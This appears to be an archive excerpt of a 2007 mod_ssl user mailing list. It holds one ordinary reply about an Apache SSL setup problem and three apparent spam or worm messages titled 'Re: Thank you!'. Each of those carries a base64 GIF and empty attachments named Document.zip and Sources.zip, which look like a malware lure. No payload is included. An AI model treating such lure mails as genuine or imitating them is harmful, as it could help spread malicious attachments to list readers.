Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  2 17:26:49 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EFF2914D895; Fri,  2 Feb 2007 17:26:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from babylon.hostgo.com (babylon.hostgo.com [65.19.169.34])
	by master.modssl.org (Postfix) with ESMTP id 6F7D014D83F
	for ; Fri,  2 Feb 2007 17:26:48 +0100 (CET)
Received: from 34.red-81-47-4.staticip.rima-tde.net ([81.47.4.34] helo=Portatil)
	by babylon.hostgo.com with esmtpa (Exim 4.63)
	(envelope-from )
	id 1HD1Et-0006li-MJ
	for modssl-users@modssl.org; Fri, 02 Feb 2007 11:26:18 -0500
Subject: Re: Problem in Setting Up SSL
From: devel 
To: modssl-users@modssl.org
In-Reply-To: <00f001c746ca$0c8d1860$acc74d0a@persistent.co.in>
References: <00f001c746ca$0c8d1860$acc74d0a@persistent.co.in>
Content-Type: text/plain; charset=UTF-8
Date: Fri, 02 Feb 2007 17:26:07 +0100
Message-Id: <1170433567.5428.11.camel@Portatil>
Mime-Version: 1.0
X-Mailer: Evolution 2.6.2 
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - babylon.hostgo.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - pas-world.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: devel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are you sure that mod_ssl httpd module is listen in localhost:2443?



O vie, 02-02-2007 =C3=A1s 18:30 +0530, Shyam Shukla escribiu:
> Hi All,
>=20
> =20
>=20
> I am getting problem in setting up SSL in apache 2.0.59 in linux
> platform.
>=20
> I followed the steps as below:
>=20
> =20
>=20
> 1- Created a self signed ca cert.
>=20
> 2- Created a server cert using the same ca.
>=20
> 3- Created two directories ssl.crt and ssl.key under
> apache_server_home_dir/conf to put ca, server cert and private key.
>=20
> 4- Modified ssl.conf file to define ssl port, server name, path to
> certificates etc.
>=20
> =20
>=20
> I did all the steps that I had done previously with apache 2.0.52,
> which was working in ssl mode but in case of apache 2.0.59, it does
> not start up at all.
>=20
> =20
>=20
> When I try to access through browser, for e.g. https://hostname:2443,
> I get the message =E2=80=9Cpage can not be displayed=E2=80=9D.
>=20
> =20
>=20
> Can anyone guide me where am I going wrong or could send me some
> documents to setup ssl in apache 2.0.59?
>=20
> =20
>=20
> =20
>=20
> =20
>=20
> Best Regards,
> Shyam Shukla
>=20
>=20
>=20
> =20
>=20
>=20
> DISCLAIMER =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D This e-mail may contain privile=
ged and
> confidential information which is the property of Persistent Systems
> Pvt. Ltd. It is intended only for the use of the individual or entity
> to which it is addressed. If you are not the intended recipient, you
> are not authorized to read, retain, copy, print, distribute or use
> this message. If you have received this communication in error, please
> notify the sender and delete all copies of this message. Persistent
> Systems Pvt. Ltd. does not accept any liability for virus infected
> mails.
>=20
--
Devel it, Precio http://www.pas-world.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  5 15:32:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9125014D897; Mon,  5 Feb 2007 15:32:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id A8DDC14D83A
	for ; Mon,  5 Feb 2007 15:32:04 +0100 (CET)
Date: Mon, 05 Feb 2007 09:44:17 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  6 16:33:34 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4F97514D86D; Tue,  6 Feb 2007 16:33:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id AAAD614D82F
	for ; Tue,  6 Feb 2007 16:33:25 +0100 (CET)
Date: Tue, 06 Feb 2007 10:45:45 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb  8 15:14:26 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A882E14D890; Thu,  8 Feb 2007 15:14:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 05DAA14D83E
	for ; Thu,  8 Feb 2007 15:14:25 +0100 (CET)
Date: Thu, 08 Feb 2007 09:26:47 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

